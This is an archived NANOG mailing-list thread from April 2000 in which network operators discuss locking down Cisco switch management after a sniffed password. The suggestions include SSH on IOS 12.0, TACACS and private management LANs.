Merit Network
Can't find what you're looking for? Search the Mail Archives.
  About Merit   Services   Network   Resources & Support   Network Research   News   Events   Home

Discussion Communities: Merit Network Email List Archives

North American Network Operators Group

Date Prev | Date Next | Date Index | Thread Index | Author Index | Historical

RE: ABOVE.NET SECURITY TRUTHS?

  • From: Roeland Meyer (E-mail)
  • Date: Fri Apr 28 17:57:53 2000

The private net is still subject to wire-tap tricks. If the switch supports SSH1 then that should be sufficient. MHSC.NET, and every host I setup for dot-com clients, gets a telnetd/ftpd-ectomy for free. If it needs CLI access, it gets SSH or, you have to go to the console. Even X11 and SMB sessions are forwarded through SSH. Given this sort of secure environment, plain-text Cisco sessions stand out like a sore thumb, to a sniffer. They only have to look for the packets that are NOT encrypted. A private net is even worse, you are guaranteed that each packet is part of a network management session.

> -----Original Message-----
> From: Greene, Dylan [mailto:DGreene@NaviSite.com]
> Sent: Friday, April 28, 2000 2:10 PM
> To: 'Paul Froutan'; rmeyer@mhsc.com
> Cc: nanog@merit.edu
> Subject: RE: ABOVE.NET SECURITY TRUTHS?
> 
> 
> 
> Maybe I should read the entire message before responding.. hehe.. =)
> 
> A switched private management lan resolves the cleartext problem.  
> 
> SSH version 1 is apparently supported in 12.0 as well (never 
> played w/ it,
> so dunno how well it works);
> 
> http://www.cisco.com/univercd/cc/td/doc/product/software/ios12
0/120newft/120
limit/120s/120s5/sshv1.htm

..Dylan 

| -----Original Message-----
| From: Paul Froutan [mailto:pfroutan@rackspace.com]
| Sent: Friday, April 28, 2000 4:46 PM
| To: rmeyer@mhsc.com
| Cc: nanog@merit.edu
| Subject: RE: ABOVE.NET SECURITY TRUTHS?
| 
| 
| 
| I don't think you can.  However, I use TACACS on all my switches and 
| routers.  From what I know, TACACS passwords are encrypted 
| using the key on 
| your network devices and the TACACS server.  So, that, in 
| combination with 
| a private management LAN not accessible by your customers 
| should lock down 
| your network pretty effectively.  Any comments?
| 
| At 4/28/00 -0700, you wrote:
| 
| > > Exiled Dave
| > > Sent: Friday, April 28, 2000 1:10 PM
| >
| > > Lets think about this, cisco in no way has such a flaw
| > > that would allow someone to 'root' and erase all the
| > > info on switches. The password was sniffed.
| >
| >Can one setup SSH on a Cisco 6509?
| 
| Paul Froutan                              Email: 
| pfroutan@rackspace.com
| Rackspace, Ltd                       <http://www.rackspace.com>
| 
| 






Discussion Communities


About Merit | Services | Network | Resources & Support | Network Research
News | Events | Contact | Site Map | Merit Network Home


Merit Network, Inc.